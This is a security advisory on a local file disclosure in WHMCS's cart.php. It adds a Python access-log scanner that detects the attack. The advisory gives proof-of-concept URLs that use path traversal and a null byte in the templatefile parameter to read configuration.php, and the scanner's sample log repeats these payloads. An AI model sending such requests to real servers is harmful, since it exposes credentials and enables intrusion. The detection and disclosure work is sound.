Title: WHMCompleteSolution (cart.php) Local File Disclosure
Author: Lagripe-Dz www.2cto.com
Developer: WHMCS (WHMCompleteSolution) http://whmcs.com/
Affected Versions: 3.x.x, 4.0.x
Test Platform: linux + apache
Vulnerable file: cart.php
---------
Code Analysis:
---------
if ($a == "add")
{
    $templatefile = "configureproductdomain";
    ...etc
}
if ($a == "login")
{
    $templatefile = "login";
    ...etc
}
...
OutputClientArea($templatefile, $nowrapper);
# The OutputClientArea function will display
# "./Templates/orderforms/cart/{$templatefile}.tpl"
Details:
---------
If the variable "$a" holds one of the expected values, the script sets "$templatefile" to the matching default.
But when the value of "$a" does not match any of the default values,
you can control "$templatefile" through the request and use it for file disclosure.
Test proof:
------------------
http://www.bkjia.com/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]%00
http://www.bkjia.com/[PATH]/cart.php?a=test&templatefile=.../../configuration.php%00
Note: view the page source to see the disclosed file.
Solution:
----------
Watch the vendor's announcements and upgrade to the latest version.
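Added example (not part of the original advisory and not WHMCS code): a Python scanner that reads web-server access logs and flags cart.php requests whose templatefile parameter carries a null byte, a path traversal, or anything other than a plain template name. The combined log format, the /billing/ path, the allow-list pattern and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: legitimate template names are plain identifiers such as "login".
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def check_templatefile(value):
    """Return the reasons a templatefile value is suspicious ([] if it looks fine)."""
    for _ in range(3):  # bounded re-decoding exposes double-encoded input
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    reasons = []
    if "\x00" in value:
        reasons.append("null byte")
    if ".." in value or "/" in value or "\\" in value:
        reasons.append("path traversal")
    if not SAFE_NAME.fullmatch(value):
        reasons.append("not a plain template name")
    return reasons

def scan_access_log(lines):
    """Return (client, reasons) for each cart.php request with a suspicious templatefile."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/cart.php"):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == "templatefile" and (reasons := check_templatefile(value)):
                findings.append((line.split()[0], reasons))
    return findings

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2012:10:00:00 +0000] "GET /billing/cart.php?a=add&pid=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2012:10:02:11 +0000] "GET /billing/cart.php?a=test&templatefile=../../configuration.php%00 HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2012:10:02:40 +0000] "GET /billing/cart.php?a=x&templatefile=%252e%252e%252fconfiguration.php HTTP/1.1" 200 790',
    '192.0.2.33 - - [01/Jan/2012:10:05:02 +0000] "GET /billing/cart.php?a=view&templatefile=login HTTP/1.1" 200 4300',
]

if __name__ == "__main__":
    for client, reasons in scan_access_log(SAMPLE_LOG):
        print(client, ", ".join(reasons))
```

Access logs record only the query string, so a templatefile value sent in a POST body would need request-body logging or a WAF rule to be seen.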
================================================================================================
Greetz To All Sec4ever.com Members.